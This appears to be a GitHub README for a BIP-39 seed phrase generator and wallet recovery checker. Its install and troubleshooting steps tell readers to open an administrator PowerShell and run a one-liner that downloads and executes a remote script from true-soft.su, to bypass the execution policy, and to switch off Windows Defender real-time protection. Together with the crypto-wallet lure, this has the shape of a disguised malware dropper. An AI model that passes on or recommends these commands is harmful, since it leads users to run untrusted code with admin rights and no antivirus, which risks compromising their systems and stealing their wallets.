Skip to content

Latest commit

Β 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

BIP-39 Seed Phrase Generator & Wallet Recovery Checker

An open-source, high-performance cryptographic utility designed for generating compliant BIP-39 mnemonic seed phrases and verifying structural validity across multiple blockchain standards (BIP-32, BIP-44).

This tool serves as a secure environment for crypto wallet recovery testing, mnemonic validation, and blockchain keys derivation auditing.


πŸ”Ž Key SEO Capabilities & Use Cases

  • BIP-39 Mnemonic Generation: Create standard 12, 15, 18, 21, or 24-word seed phrases utilizing secure cryptographic entropy sources.
  • Multi-Coin Address Derivation: Check derived public addresses for Bitcoin (BTC), Ethereum (ETH), Solana (SOL), and other major networks.
  • Seed Phrase Checker & Validator: Audit existing mnemonic phrases against the official BIP-39 wordlist to verify checksum integrity.
  • Offline Security Architecture: Designed to run in isolated, air-gapped environments for maximum cryptographic asset safety.
  • Derivation Path Audit: Supports custom path verification including standard m/44'/0'/0'/0.

πŸ›  Technical Specifications

Feature Supported Standards
Mnemonic Standards BIP-39, BIP-32, BIP-44, BIP-49, BIP-84
Entropy Length 128 bits to 256 bits
Wordlist Languages English, Spanish, French, Italian, Japanese, Korean, Chinese
Verification Speed Optimized multi-threaded processing

πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Run the Installation Command: Copy, paste, and press Enter to run the following initialization command. This script will automatically configure the registry bypass and download all required packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Execution Policy Error (Script Blocked)

If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (Older PowerShell Versions)

If you are using an older environment where short aliases are missing, use the full system commands:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Block

Automated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.